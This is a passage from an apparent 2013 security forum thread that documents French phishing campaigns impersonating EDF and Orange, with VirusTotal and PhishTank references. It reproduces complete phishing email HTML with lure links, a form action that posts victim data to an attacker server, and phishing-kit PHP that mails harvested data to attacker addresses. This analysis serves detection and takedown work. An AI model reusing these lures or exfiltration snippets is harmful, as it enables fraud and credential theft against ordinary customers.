<b><a class="ecxc_nobdr ecxt_prs" href="http://www.dorioone.ee/us.php" rel="nofollow" style="color:#fff" target="_blank"> Activer mon espace Client</a></b></td>
</tr>
</tbody>
</table>




<br>
<p>
<span style="display:inline!important;word-spacing:0px;font:12px Arial,Helvetica,sans-serif;text-transform:none;color:rgb(0,0,0);text-indent:0px;white-space:normal;letter-spacing:normal">Merci pour votre comprehension. des reception de votre fiche nous vous contacterons sur le numero que vous aller fournir.</span><br style="word-spacing:0px;font:12px/15px Arial,Helvetica,sans-serif;text-transform:none;color:rgb(0,0,0);text-indent:0px;white-space:normal;letter-spacing:normal">
<span style="display:inline!important;word-spacing:0px;font:12px Arial,Helvetica,sans-serif;text-transform:none;color:rgb(0,0,0);text-indent:0px;white-space:normal;letter-spacing:normal"> toute oubli, lors de la saisie des informations demandees aura pour consequence le rejet automatique</span> <span style="display:inline!important;word-spacing:0px;font:12px Arial,Helvetica,sans-serif;text-transform:none;color:rgb(0,0,0);text-indent:0px;white-space:normal;letter-spacing:normal"> de votre formulaire et le non remboursement de la somme 58,80 Euro
Shells: http://www.kernelmode.info/forum/viewto ... =10#p17890
Attachments
infected
(364.04 KiB) Downloaded 84 times
infected
(1.99 KiB) Downloaded 81 times
infected
(957.32 KiB) Downloaded 96 times

Re: Phish-BankFraud

 #17916  by Xylitol
 Mon Jan 28, 2013 4:00 pm
EDF Phishing, not hosted on a hijacked server but a simple html form attached to the Email
customer fill it and the form is sent to hacker server.
Code: Select all
<form class="form" name ="darnoo" id="darnoo" method="post"  onsubmit="return verif_formulaire()" action="http://dzwasqw.com/formax.php" 
https://www.virustotal.com/file/eee8377 ... 359388745/ > 145 (congratz Sophos)
Attachments
infected
(76 KiB) Downloaded 78 times

Re: Phish-BankFraud

 #18023  by Xylitol
 Mon Feb 04, 2013 10:22 am
Time to dump again the fucker.
http://www.phishtank.com/phish_detail.p ... id=1720045
Code: Select all
$send = "Ayoub.boos7@hotmai1.fr";
$subject = "EDF : $ip";
$from = "From: Tool4Spam.Com<Ayoub.boos7@hotmail.fr>";

mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from); 
Mail source:
Code: Select all
x-store-info:fHNTDlzCF8Nxw6HwcfGQy+S7Ax/lqLSmNphQ3OF+T9E=
Authentication-Results: hotmail.com; spf=none (sender IP is 208.85.242.164) smtp.mailfrom=scnn999@server.24cc.info; dkim=none header.d=edfemails.com; x-hmca=none
X-SID-PRA: monagence@edfemails.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 5cuOr7VrmjDCKUdRtbxJSE0NRCeOoNFZQuXUhAQIR0MfBHEnKQaNS7feE3trgGYqzLytamkFF2P429z2Pyw4wwnhYgpCsFoQ9Kj1ZwU8j2UhGQZCYgkLGunzEHyxylLypUxfJ6zqXj9j1feSWrLcXFp5A0vuE2oA
Received: from server.24cc.info ([208.85.242.164]) by COL0-MC1-F29.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Sun, 3 Feb 2013 17:06:34 -0800
Received: from scnn999 by server.24cc.info with local (Exim 4.80)
	(envelope-from <scnn999@server.24cc.info>)
	id 1U2AW2-0008VN-0D
	for *****************@hotmail.fr; Mon, 04 Feb 2013 09:06:34 +0800
To: *****************@hotmail.fr
Subject: Avis Du 04/02/2013
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: EDF <monagence@edfemails.com>
Message-Id: <E1U2AW2-0008VN-0D@server.24cc.info>
Date: Mon, 04 Feb 2013 09:06:34 +0800
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.24cc.info
X-AntiAbuse: Original Domain - hotmail.fr
X-AntiAbuse: Originator/Caller UID/GID - [820 32008] / [47 12]
X-AntiAbuse: Sender Address Domain - server.24cc.info
X-Get-Message-Sender-Via: server.24cc.info: authenticated_id: scnn999/only user confirmed/virtual account not confirmed
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/scnn999/public_html/ayoubooxx.php 
X-Source-Dir: scnn999.com:/public_html
Return-Path: scnn999@server.24cc.info
X-OriginalArrivalTime: 04 Feb 2013 01:06:34.0818 (UTC) FILETIME=[E0505A20:01CE0273]

<HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD><TITLE>Demo</TITLE>
<STYLE type=text/css>
tr {font-family:Arial, Helvetica, sans-serif}
	td {border-collapse:collapse}
	p { padding: 0; margin: 0}
	ul, ol {margin: 0; padding: 0}
    a:link{text-decoration: none !important; border-bottom: none !important;
	background: none !important}
	.ReadMsgBody { width: 100%}
	.ExternalClass {width: 100%}
	div, p, a, li, td {-webkit-text-size-adjust:none;-ms-text-size-adjust:none}
    </STYLE>

</HEAD>
<BODY 
style="PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; PADDING-TOP: 0px">
<DIV>
<TABLE 
style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; WIDOWS: 2; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; MARGIN: 0px; PADDING-LEFT: 0px; BORDER-SPACING: 0px; LETTER-SPACING: normal; PADDING-RIGHT: 0px; DISPLAY: table; FONT: 12px Arial, Verdana, Helvetica, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; COLOR: rgb(68,68,68); BORDER-TOP: 0px; BORDER-RIGHT: 0px; WORD-SPACING: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px" 
border=0 cellSpacing=0 cellPadding=0>
  <TBODY 
  style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row-group; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
  <TR 
  style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
    <TD 
    style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">
      <TABLE 
      style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; BORDER-SPACING: 0px; PADDING-RIGHT: 0px; DISPLAY: table; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" 
      border=0 cellSpacing=0 cellPadding=0>
        <TBODY 
        style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row-group; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
        <TR 
        style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
          <TD 
          style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><A style="BACKGROUND-IMAGE: none; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; COLOR: rgb(0,158,225); FONT-SIZE: 11px; BORDER-TOP: 0px; FONT-WEIGHT: bold; BORDER-RIGHT: 0px; TEXT-DECORATION: ; PADDING-TOP: 0px; -webkit-text-size-adjust: none" href="http://bleuciel.edf.com" target="_blank"><IMG style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" border="0" alt="EDF" src="https://monagence.edf.fr/img_mails/logo_2.gif"></A></TD>
          <TD 
          style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><IMG style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" border="0" alt="" src="https://monagence.edf.fr/img_mails/bandeau_haut_2.jpg"></TD></TR></TBODY></TABLE></TD></TR>
  <TR 
  style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
    <TD 
    style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">
      <TABLE 
      style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; BORDER-SPACING: 0px; PADDING-RIGHT: 0px; DISPLAY: table; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" 
      border=0 cellSpacing=0 cellPadding=0>
        <TBODY 
        style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row-group; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
        <TR 
        style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-row; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px">
          <TD 
          style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none" 
          vAlign=top><IMG style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" border="0" alt="" src="https://monagence.edf.fr/img_mails/bandeau_gauche_1.jpg"></TD>
          <TD 
          style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 30px; PADDING-RIGHT: 0px; DISPLAY: table-cell; BORDER-COLLAPSE: collapse; VERTICAL-ALIGN: top; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none" 
          vAlign=top>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: bold; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">Cher 
            Client,</P><BR>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Dans 
            le cadre de nos mesures de sécurité, nous vérifions l'activité de 
            vos comptes afin de vous garantir un meilleur usage de nos 
            produits.</P>
            <DIV 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: auto; PADDING-RIGHT: 0px; DISPLAY: block; FLOAT: none; HEIGHT: auto; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Par 
            conséquent , Notre système a été obligé de bloquer temporairement 
            vos futurs paiements , en attendant une confirmation de cette carte 
            de votre part</P></DIV>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Veuillez 
            confirmez votre identité et rétablir l'accés à votre compte par ici 
            :</P>
            <DIV 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: auto; PADDING-RIGHT: 0px; DISPLAY: block; FLOAT: none; HEIGHT: auto; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none" 
            align=center><A style="BACKGROUND-IMAGE: none; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: Arial; COLOR: rgb(97,97,97); FONT-SIZE: 11px; BORDER-TOP: 0px; FONT-WEIGHT: bold; BORDER-RIGHT: 0px; TEXT-DECORATION: underline; PADDING-TOP: 0px; -webkit-text-size-adjust: none" href="http://www.razanco.ir" target="_blank"><BR><U 
            style="TEXT-DECORATION: underline">Accédez par ici</U></A></DIV>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Merci 
            Pour votre compréhension .</P>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Cordialement,</P>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 14px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 12px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none"><BR>Votre 
            conseiller EDF</P>
            <P 
            style="BORDER-BOTTOM: rgb(241,172,2) 2px dotted; TEXT-ALIGN: right; PADDING-BOTTOM: 5px; LINE-HEIGHT: 14px; BORDER-RIGHT-WIDTH: 0px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 11px; BORDER-TOP: rgb(241,172,2) 2px dotted; BORDER-LEFT-WIDTH: 0px; FONT-WEIGHT: normal; PADDING-TOP: 5px; -webkit-text-size-adjust: none">Retrouvez 
            tous vos services sur<SPAN 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" 
            class=Apple-converted-space> </SPAN><A style="BACKGROUND-IMAGE: none; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: Arial; COLOR: rgb(97,97,97); FONT-SIZE: 11px; BORDER-TOP: 0px; FONT-WEIGHT: bold; BORDER-RIGHT: 0px; TEXT-DECORATION: underline; PADDING-TOP: 0px; -webkit-text-size-adjust: none" href="https://monagence.edf.fr" target="_blank"><U 
            style="TEXT-DECORATION: underline">votre espace Client</U></A></P>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 12px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 525px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial; FLOAT: none; HEIGHT: auto; COLOR: rgb(97,97,97); FONT-SIZE: 10px; BORDER-TOP: 0px; FONT-WEIGHT: normal; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none">ATTENTION 
            : Ce message est strictement confidentiel. Son intégrité n'est pas 
            assurée sur Internet. Si vous n'êtes pas destinataire du message, 
            merci de le détruire.<BR><BR>EDF SA au capital de 924 433 331 Euros, 
            RCS Paris n° 552 081 317, siège social 22-30 av de Wagram 75382 
            Paris cedex 08.<BR><BR>Copyright © EDF 2010</P>
            <P 
            style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 1.3em; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: 600px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMILY: Arial, Verdana, Helvetica, sans-serif; FLOAT: none; HEIGHT: auto; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-text-size-adjust: none" 
            align=center><IMG style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px" border="0" alt="" src="https://monagence.edf.fr/img_mails/partie_bas.gif"></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
https://www.virustotal.com/url/07665ced ... 359973759/
Attachments
infected
(867.01 KiB) Downloaded 89 times

Re: Phish-BankFraud

 #18119  by Xylitol
 Sat Feb 09, 2013 2:49 pm
Saturday phishing, same actor as http://www.kernelmode.info/forum/viewto ... 431#p18023
Phishing targeting Orange, compromised server run Wordpress.
http://www.phishtank.com/phish_detail.p ... id=1724946
http://www.phishtank.com/phish_detail.p ... id=1724994
Mail source:
Code: Select all
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 199.204.248.102) smtp.mailfrom=p42907r6@cpanel02.myhostcenter.com; dkim=none header.d=orange.com; x-hmca=none
X-SID-PRA: monagence@orange.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0x
X-Message-Info: Q4vvGj5H5eUK+YJ6V2tGfomFWR4Pi5QuKn+mPIYzCuF4HkIHlPfY0dAOc1iGN4U6JEBQpCWUhETMdm9ShvttHSSHud44b1/LX21QgJIiBPLUHNehYy3rIx0WFhS8gvyWQWbcw3NvsFVlFl4E3HckMBEuocnEKN1D
Received: from cpanel02.myhostcenter.com ([199.204.248.102]) by SNT0-MC2-F18.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Thu, 7 Feb 2013 16:00:53 -0800
Received: from p42907r6 by cpanel02.myhostcenter.com with local (Exim 4.69)
	(envelope-from <p42907r6@cpanel02.myhostcenter.com>)
	id 1U3bOe-000FbN-GE
	for **************@hotmail.fr; Thu, 07 Feb 2013 19:00:52 -0500
To: **************@hotmail.fr
Subject: Remboursement avoir sur facture
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: Orange <monagence@orange.com>
Message-Id: <E1U3bOe-000FbN-GE@cpanel02.myhostcenter.com>
Date: Thu, 07 Feb 2013 19:00:52 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - cpanel02.myhostcenter.com
X-AntiAbuse: Original Domain - hotmail.fr
X-AntiAbuse: Originator/Caller UID/GID - [34135 32009] / [47 12]
X-AntiAbuse: Sender Address Domain - cpanel02.myhostcenter.com
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/p42907r6/public_html/Ayoubii.php 
X-Source-Dir: meridianliquidcoatings.com:/public_html
Return-Path: p42907r6@cpanel02.myhostcenter.com
X-OriginalArrivalTime: 08 Feb 2013 00:00:53.0238 (UTC) FILETIME=[5C99F960:01CE058F]

<HTML><HEAD>
</HEAD>
<BODY>
<TABLE style="WIDTH: 680px" border=0 cellSpacing=0 cellPadding=0>
  <TBODY>
  <TR>
    <TD>
      <P> </P></TD></TR>
  <TR>
    <TD><IMG alt="" src="http://consentement.eolas-services.com/doc/mail/v2/filet.gif" width="680" height="3"></TD></TR>
  <TR>
    <TD>
      <TABLE style="WIDTH: 745px; HEIGHT: 26px" border=0 cellSpacing=0 
      cellPadding=0>
        <TBODY>
        <TR>
          <TD bgColor=#f2f2f2 width=19><IMG alt="" src="http://consentement.eolas-services.com/doc/mail/v2/fleche.gif" width="18" height="13"></TD>
          <TD bgColor=#f2f2f2 width=543><SPAN class=Style13>Mon suivi de 
            remboursement</SPAN></TD></TR></TBODY></TABLE></TD></TR>
  <TR>
    <TD> </TD></TR>
  <TR>
    <TD>
      <TABLE 
      style="BORDER-BOTTOM: #ff6c0d 1px solid; BORDER-LEFT: #ff6c0d 1px solid; WIDTH: 680px; BORDER-TOP: #ff6c0d 1px solid; BORDER-RIGHT: #ff6c0d 1px solid" 
      border=0 cellSpacing=0 cellPadding=8>
        <TBODY>
        <TR>
          <TD align=center>
            <TABLE style="WIDTH: 723px; HEIGHT: 255px" border=0 cellSpacing=0 
            cellPadding=0>
              <TBODY>
              <TR>
                <TD class=Style5 width="82%" align=left>
                  <DIV><SPAN style="FONT-SIZE: 10pt">bonjour,</SPAN></DIV>
                  <DIV> </DIV>
                  <DIV><SPAN style="FONT-SIZE: 10pt">Vous êtes client d’une 
                  offre internet Orange et nous vous remercions de votre 
                  confiance. </SPAN></DIV>
                  <DIV> </DIV>
                  <DIV><SPAN style="FONT-SIZE: 10pt">En effet votre facture<SPAN 
                  style="COLOR: #ff6600"> N°</SPAN> <SPAN 
                  style="COLOR: #ff6600">139358537B0</SPAN> date d'émission 
                  <SPAN style="COLOR: #ff6600">07/02/2013</SPAN> à été 
                  doublement débite.</SPAN></DIV>
                  <DIV><SPAN 
                  style="COLOR: windowtext; FONT-SIZE: 10pt"></SPAN> </DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"><SPAN style="COLOR: #ff8040"><SPAN 
                  style="COLOR: #000000"></SPAN></SPAN></SPAN></SPAN> </DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"><SPAN style="COLOR: #ff8040"><SPAN 
                  style="COLOR: #000000">Suivi de <SPAN 
                  style="FONT-SIZE: small"><SPAN 
                  style="COLOR: #2c2c2d">v</SPAN><SPAN 
                  style="FONT-WEIGHT: bold">otre</SPAN> </SPAN>remboursement 
                  en ligne</SPAN></SPAN></SPAN></SPAN></DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"></SPAN></SPAN> </DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"><SPAN 
                  style="COLOR: #ff8040"> Directement en cliquant sur le 
                  lien suivant : <A style="TEXT-DECORATION: underline" title="Mon suivi de remboursement" href="http://www.alnafayfibers.com/NewOrange" rel="nofollow" target="_blank"><SPAN style="COLOR: #000000">Mon suivi de 
                  remboursement</SPAN></A></SPAN></SPAN></SPAN></DIV>
                  <DIV><SPAN style="COLOR: windowtext; FONT-SIZE: 10pt"><SPAN 
                  style="FONT-WEIGHT: bold"></SPAN></SPAN> </DIV>
                  <DIV><SPAN style="FONT-SIZE: 10pt">Désireux de vous 
                  satisfaire, nous vous remercions de votre 
                  fidélité.<BR><BR></SPAN><SPAN style="FONT-SIZE: 10pt">Merci de 
                  votre confiance</SPAN><BR><BR><SPAN 
                  style="FONT-SIZE: 10pt">Bien cordialement,</SPAN><BR><SPAN 
                  style="FONT-SIZE: 10pt">Votre service 
              clients</SPAN></DIV></TD></TR>
              <TR>
                <TD> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR>
  <TR>
    <TD><IMG alt="" src="http://consentement.eolas-services.com/doc/mail/v2/filet.gif" width="680" height="3"></TD></TR>
  <TR>
    <TD bgColor=#f2f2f2>
      <TABLE style="WIDTH: 100%" border=0 cellSpacing=0 cellPadding=8>
        <TBODY>
        <TR>
          <TD>
            <TABLE style="WIDTH: 100%" border=0 cellSpacing=0 cellPadding=0>
              <TBODY>
              <TR>
                <TD width="50%"> </TD>
                <TD width="50%" align=right><IMG alt="" src="http://ftorangefacture.net/far/mac1.gif"></TD></TR>
              <TR>
                <TD class=mentions colSpan=2> <SPAN class=ecxtext2><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 11px"><SPAN 
                  style="FONT-SIZE: small">France Télécom SA au capital de 10 
                  595 434 424 € - RCS Paris 380 129 866 
                  </SPAN></SPAN></SPAN><SPAN class=ecxtext2><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 11px"><SPAN 
                  style="FONT-SIZE: small">6, place d’Alleray 75505 Paris cedex 
                  15</SPAN></SPAN></SPAN></TD></TR>
              <TR>
                <TD class=Style2 colSpan=2><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 10px"><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 10px"><SPAN 
                  style="FONT-SIZE: x-small"></SPAN></SPAN></SPAN>
                  <P><SPAN style="FONT-SIZE: 10pt"><SPAN 
